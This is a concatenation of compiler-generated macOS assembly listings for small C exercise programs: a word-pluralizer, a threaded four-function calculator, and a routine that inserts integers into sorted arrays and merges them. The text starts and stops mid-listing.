movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $101, %eax je LBB0_25 ## %bb.21: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $105, %eax je LBB0_25 ## %bb.22: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $111, %eax je LBB0_25 ## %bb.23: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $117, %eax je LBB0_25 ## %bb.24: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movb $0, (%rax,%rcx) movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf jmp LBB0_37 LBB0_25: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $111, %eax je LBB0_28 ## %bb.26: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $115, %eax je LBB0_28 ## %bb.27: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $120, %eax jne LBB0_29 LBB0_28: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf jmp LBB0_36 LBB0_29: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $99, %eax jne LBB0_31 ## %bb.30: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $104, %eax je LBB0_33 LBB0_31: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $115, %eax jne LBB0_34 ## %bb.32: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $104, %eax jne LBB0_34 LBB0_33: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf jmp LBB0_35 LBB0_34: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf LBB0_35: ## in Loop: Header=BB0_9 Depth=1 jmp LBB0_36 LBB0_36: ## in Loop: Header=BB0_9 Depth=1 jmp LBB0_37 LBB0_37: ## in Loop: Header=BB0_9 Depth=1 jmp LBB0_38 LBB0_38: ## in Loop: Header=BB0_9 Depth=1 movl -2832(%rbp), %eax addl $1, %eax movl %eax, -2832(%rbp) jmp LBB0_9 LBB0_39: movl -2820(%rbp), %eax movl %eax, -2848(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_41 ## %bb.40: movl -2848(%rbp), %eax ## 4-byte Reload addq $2848, %rsp ## imm = 0xB20 popq %rbp retq LBB0_41: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d" L_.str.1: ## @.str.1 .asciz "%s %s" L_.str.2: ## @.str.2 .asciz "%s" L_.str.3: ## @.str.3 .asciz "%s\n" L_.str.4: ## @.str.4 .asciz "%sies\n" L_.str.5: ## @.str.5 .asciz "%ses\n" L_.str.6: ## @.str.6 .asciz "%ss\n" .subsections_via_symbols
the_stack_data/3262216.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _sum ; -- Begin function sum .p2align 2 _sum: ; @sum .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] stur x8, [x29, #-16] ldur x8, [x29, #-16] ldr w8, [x8] stur w8, [x29, #-20] ldur x8, [x29, #-16] ldr w8, [x8, #4] str w8, [sp, #24] ldur w8, [x29, #-20] ; implicit-def: $x11 mov x11, x8 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-20] ldr w10, [sp, #24] add w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _subtract ; -- Begin function subtract .p2align 2 _subtract: ; @subtract .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] stur x8, [x29, #-16] ldur x8, [x29, #-16] ldr w8, [x8] stur w8, [x29, #-20] ldur x8, [x29, #-16] ldr w8, [x8, #4] str w8, [sp, #24] ldur w8, [x29, #-20] ; implicit-def: $x11 mov x11, x8 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-20] ldr w10, [sp, #24] subs w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _multiply ; -- Begin function multiply .p2align 2 _multiply: ; @multiply .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] stur x8, [x29, #-16] ldur x8, [x29, #-16] ldr w8, [x8] stur w8, [x29, #-20] ldur x8, [x29, #-16] ldr w8, [x8, #4] str w8, [sp, #24] ldur w8, [x29, #-20] ; implicit-def: $x11 mov x11, x8 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-20] ldr w10, [sp, #24] mul w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov x0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _divide ; -- Begin function divide .p2align 2 _divide: ; @divide .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] stur x8, [x29, #-16] ldur x8, [x29, #-16] ldr w8, [x8] stur w8, [x29, #-20] ldur x8, [x29, #-16] ldr w8, [x8, #4] str w8, [sp, #24] ldur w8, [x29, #-20] ; implicit-def: $x11 mov x11, x8 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-20] ldr w10, [sp, #24] sdiv w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov x0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf add x10, sp, #48 str x10, [sp, #32] ; 8-byte Folded Spill add x8, x10, #4 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _scanf ldr x3, [sp, #32] ; 8-byte Folded Reload sub x0, x29, #40 str x0, [sp, #24] ; 8-byte Folded Spill mov x1, #0 str x1, [sp, #40] ; 8-byte Folded Spill adrp x2, _sum@PAGE add x2, x2, _sum@PAGEOFF bl _pthread_create ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldr x1, [sp, #40] ; 8-byte Folded Reload add x0, x8, #8 adrp x2, _subtract@PAGE add x2, x2, _subtract@PAGEOFF bl _pthread_create ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldr x1, [sp, #40] ; 8-byte Folded Reload add x0, x8, #16 adrp x2, _multiply@PAGE add x2, x2, _multiply@PAGEOFF bl _pthread_create ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x3, [sp, #32] ; 8-byte Folded Reload ldr x1, [sp, #40] ; 8-byte Folded Reload add x0, x8, #24 adrp x2, _divide@PAGE add x2, x2, _divide@PAGEOFF bl _pthread_create ldr x0, [sp, #40] ; 8-byte Folded Reload bl _pthread_exit .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d + %d = %d\n" l_.str.1: ; @.str.1 .asciz "%d - %d = %d\n" l_.str.2: ; @.str.2 .asciz "%d * %d = %d\n" l_.str.3: ; @.str.3 .asciz "%d / %d = %d\n" l_.str.4: ; @.str.4 .asciz "The numbers pretty please (a b) " l_.str.5: ; @.str.5 .asciz "%d %d" .comm _numbers,8,2 ; @numbers .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _sum ## -- Begin function sum .p2align 4, 0x90 _sum: ## @sum .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movl 4(%rax), %eax movl %eax, -24(%rbp) movl -20(%rbp), %esi movl -24(%rbp), %edx movl -20(%rbp), %ecx addl -24(%rbp), %ecx leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax ## kill: def $rax killed $eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _subtract ## -- Begin function subtract .p2align 4, 0x90 _subtract: ## @subtract .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movl 4(%rax), %eax movl %eax, -24(%rbp) movl -20(%rbp), %esi movl -24(%rbp), %edx movl -20(%rbp), %ecx subl -24(%rbp), %ecx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax ## kill: def $rax killed $eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _multiply ## -- Begin function multiply .p2align 4, 0x90 _multiply: ## @multiply .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movl 4(%rax), %eax movl %eax, -24(%rbp) movl -20(%rbp), %esi movl -24(%rbp), %edx movl -20(%rbp), %ecx imull -24(%rbp), %ecx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax ## kill: def $rax killed $eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _divide ## -- Begin function divide .p2align 4, 0x90 _divide: ## @divide .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movl 4(%rax), %eax movl %eax, -24(%rbp) movl -20(%rbp), %esi movl -24(%rbp), %eax movl %eax, -28(%rbp) ## 4-byte Spill movl -20(%rbp), %eax cltd idivl -24(%rbp) movl -28(%rbp), %edx ## 4-byte Reload movl %eax, %ecx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax ## kill: def $rax killed $eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movl $0, -4(%rbp) leaq L_.str.4(%rip), %rdi xorl %eax, %eax movl %eax, -76(%rbp) ## 4-byte Spill movb %al, -77(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -77(%rbp), %al ## 1-byte Reload leaq -52(%rbp), %rdx leaq L_.str.5(%rip), %rdi leaq -56(%rbp), %rsi movq %rsi, -72(%rbp) ## 8-byte Spill callq _scanf movq -72(%rbp), %rcx ## 8-byte Reload ## kill: def $edx killed $eax movl -76(%rbp), %eax ## 4-byte Reload leaq _sum(%rip), %rdx movl %eax, %esi movq %rsi, -64(%rbp) ## 8-byte Spill leaq -48(%rbp), %rdi callq _pthread_create movq -72(%rbp), %rcx ## 8-byte Reload movq -64(%rbp), %rsi ## 8-byte Reload leaq -40(%rbp), %rdi leaq _subtract(%rip), %rdx callq _pthread_create movq -72(%rbp), %rcx ## 8-byte Reload movq -64(%rbp), %rsi ## 8-byte Reload leaq -32(%rbp), %rdi leaq _multiply(%rip), %rdx callq _pthread_create movq -72(%rbp), %rcx ## 8-byte Reload movq -64(%rbp), %rsi ## 8-byte Reload leaq -24(%rbp), %rdi leaq _divide(%rip), %rdx callq _pthread_create movq -64(%rbp), %rdi ## 8-byte Reload callq _pthread_exit .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d + %d = %d\n" L_.str.1: ## @.str.1 .asciz "%d - %d = %d\n" L_.str.2: ## @.str.2 .asciz "%d * %d = %d\n" L_.str.3: ## @.str.3 .asciz "%d / %d = %d\n" L_.str.4: ## @.str.4 .asciz "The numbers pretty please (a b) " L_.str.5: ## @.str.5 .asciz "%d %d" .comm _numbers,8,2 ## @numbers .subsections_via_symbols
the_stack_data/76699296.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #208 .cfi_def_cfa_offset 208 stp x29, x30, [sp, #192] ; 16-byte Folded Spill add x29, sp, #192 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #68] str wzr, [sp, #60] str wzr, [sp, #56] str wzr, [sp, #52] mov x9, sp add x8, sp, #64 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_5 Depth 2 ; Child Loop BB0_10 Depth 2 ldr w8, [sp, #60] subs w8, w8, #7 cset w8, ge mov w9, #0 str w9, [sp, #36] ; 4-byte Folded Spill tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #64] subs w8, w8, #0 cset w8, gt str w8, [sp, #36] ; 4-byte Folded Spill b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #36] ; 4-byte Folded Reload tbz w8, #0, LBB0_16 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #48] b LBB0_5 LBB0_5: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #48] ldr w9, [sp, #60] subs w8, w8, w9 cset w8, ge mov w9, #0 str w9, [sp, #32] ; 4-byte Folded Spill tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #64] ldrsw x10, [sp, #48] sub x9, x29, #36 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, gt str w8, [sp, #32] ; 4-byte Folded Spill b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #32] ; 4-byte Folded Reload tbz w8, #0, LBB0_9 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB0_5 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #60] str w8, [sp, #44] b LBB0_10 LBB0_10: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #44] ldr w9, [sp, #48] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_13 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_10 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 sub x9, x29, #36 ldr w8, [x9, w8, sxtw #2] ldrsw x10, [sp, #44] str w8, [x9, x10, lsl #2] b LBB0_12 LBB0_12: ; in Loop: Header=BB0_10 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 str w8, [sp, #44] b LBB0_10 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #64] ldrsw x10, [sp, #48] sub x9, x29, #36 str w8, [x9, x10, lsl #2] ldr w8, [sp, #60] add w8, w8, #1 str w8, [sp, #60] ldr w8, [sp, #60] subs w8, w8, #7 cset w8, ge tbnz w8, #0, LBB0_15 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_1 Depth=1 mov x9, sp add x8, sp, #64 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_15 LBB0_15: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_16: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf str wzr, [sp, #44] b LBB0_17 LBB0_17: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #44] ldr w9, [sp, #60] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_20 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_17 Depth=1 ldrsw x9, [sp, #44] sub x8, x29, #36 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_19 LBB0_19: ; in Loop: Header=BB0_17 Depth=1 ldr w8, [sp, #44] add w8, w8, #1 str w8, [sp, #44] b LBB0_17 LBB0_20: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov x9, sp add x8, sp, #64 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_21 LBB0_21: ; =>This Loop Header: Depth=1 ; Child Loop BB0_25 Depth 2 ; Child Loop BB0_30 Depth 2 ldr w8, [sp, #56] subs w8, w8, #7 cset w8, ge mov w9, #0 str w9, [sp, #28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_23 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_21 Depth=1 ldr w8, [sp, #64] subs w8, w8, #0 cset w8, gt str w8, [sp, #28] ; 4-byte Folded Spill b LBB0_23 LBB0_23: ; in Loop: Header=BB0_21 Depth=1 ldr w8, [sp, #28] ; 4-byte Folded Reload tbz w8, #0, LBB0_36 b LBB0_24 LBB0_24: ; in Loop: Header=BB0_21 Depth=1 str wzr, [sp, #48] b LBB0_25 LBB0_25: ; Parent Loop BB0_21 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #48] ldr w9, [sp, #56] subs w8, w8, w9 cset w8, ge mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_27 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_25 Depth=2 ldr w8, [sp, #64] ldrsw x10, [sp, #48] sub x9, x29, #64 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, gt str w8, [sp, #24] ; 4-byte Folded Spill b LBB0_27 LBB0_27: ; in Loop: Header=BB0_25 Depth=2 ldr w8, [sp, #24] ; 4-byte Folded Reload tbz w8, #0, LBB0_29 b LBB0_28 LBB0_28: ; in Loop: Header=BB0_25 Depth=2 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB0_25 LBB0_29: ; in Loop: Header=BB0_21 Depth=1 ldr w8, [sp, #56] str w8, [sp, #44] b LBB0_30 LBB0_30: ; Parent Loop BB0_21 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #44] ldr w9, [sp, #48] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_33 b LBB0_31 LBB0_31: ; in Loop: Header=BB0_30 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 sub x9, x29, #64 ldr w8, [x9, w8, sxtw #2] ldrsw x10, [sp, #44] str w8, [x9, x10, lsl #2] b LBB0_32 LBB0_32: ; in Loop: Header=BB0_30 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 str w8, [sp, #44] b LBB0_30 LBB0_33: ; in Loop: Header=BB0_21 Depth=1 ldr w8, [sp, #64] ldrsw x10, [sp, #48] sub x9, x29, #64 str w8, [x9, x10, lsl #2] ldr w8, [sp, #56] add w8, w8, #1 str w8, [sp, #56] ldr w8, [sp, #56] subs w8, w8, #7 cset w8, ge tbnz w8, #0, LBB0_35 b LBB0_34 LBB0_34: ; in Loop: Header=BB0_21 Depth=1 mov x9, sp add x8, sp, #64 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_35 LBB0_35: ; in Loop: Header=BB0_21 Depth=1 b LBB0_21 LBB0_36: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf str wzr, [sp, #44] b LBB0_37 LBB0_37: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #44] ldr w9, [sp, #56] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_40 b LBB0_38 LBB0_38: ; in Loop: Header=BB0_37 Depth=1 ldrsw x9, [sp, #44] sub x8, x29, #64 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_39 LBB0_39: ; in Loop: Header=BB0_37 Depth=1 ldr w8, [sp, #44] add w8, w8, #1 str w8, [sp, #44] b LBB0_37 LBB0_40: str wzr, [sp, #44] b LBB0_41 LBB0_41: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #44] ldr w9, [sp, #60] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_44 b LBB0_42 LBB0_42: ; in Loop: Header=BB0_41 Depth=1 ldrsw x9, [sp, #44] sub x8, x29, #36 ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #44] add x9, sp, #72 str w8, [x9, x10, lsl #2] ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB0_43 LBB0_43: ; in Loop: Header=BB0_41 Depth=1 ldr w8, [sp, #44] add w8, w8, #1 str w8, [sp, #44] b LBB0_41 LBB0_44: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf str wzr, [sp, #40] b LBB0_45 LBB0_45: ; =>This Loop Header: Depth=1 ; Child Loop BB0_47 Depth 2 ; Child Loop BB0_52 Depth 2 ldr w8, [sp, #40] ldr w9, [sp, #56] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_57 b LBB0_46 LBB0_46: ; in Loop: Header=BB0_45 Depth=1 str wzr, [sp, #48] b LBB0_47 LBB0_47: ; Parent Loop BB0_45 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #48] ldr w9, [sp, #52] subs w8, w8, w9 cset w8, ge mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB0_49 b LBB0_48 LBB0_48: ; in Loop: Header=BB0_47 Depth=2 ldrsw x9, [sp, #40] sub x8, x29, #64 ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #48] add x9, sp, #72 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, gt str w8, [sp, #20] ; 4-byte Folded Spill b LBB0_49 LBB0_49: ; in Loop: Header=BB0_47 Depth=2 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB0_51 b LBB0_50 LBB0_50: ; in Loop: Header=BB0_47 Depth=2 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB0_47 LBB0_51: ; in Loop: Header=BB0_45 Depth=1 ldr w8, [sp, #52] str w8, [sp, #44] b LBB0_52 LBB0_52: ; Parent Loop BB0_45 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #44] ldr w9, [sp, #48] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_55 b LBB0_53 LBB0_53: ; in Loop: Header=BB0_52 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 add x9, sp, #72 ldr w8, [x9, w8, sxtw #2] ldrsw x10, [sp, #44] str w8, [x9, x10, lsl #2] b LBB0_54 LBB0_54: ; in Loop: Header=BB0_52 Depth=2 ldr w8, [sp, #44] subs w8, w8, #1 str w8, [sp, #44] b LBB0_52 LBB0_55: ; in Loop: Header=BB0_45 Depth=1 ldrsw x9, [sp, #40] sub x8, x29, #64 ldr w8, [x8, x9, lsl #2] ldrsw x10, [sp, #48] add x9, sp, #72 str w8, [x9, x10, lsl #2] ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB0_56 LBB0_56: ; in Loop: Header=BB0_45 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB0_45 LBB0_57: str wzr, [sp, #44] b LBB0_58 LBB0_58: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #44] ldr w9, [sp, #52] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_61 b LBB0_59 LBB0_59: ; in Loop: Header=BB0_58 Depth=1 ldrsw x9, 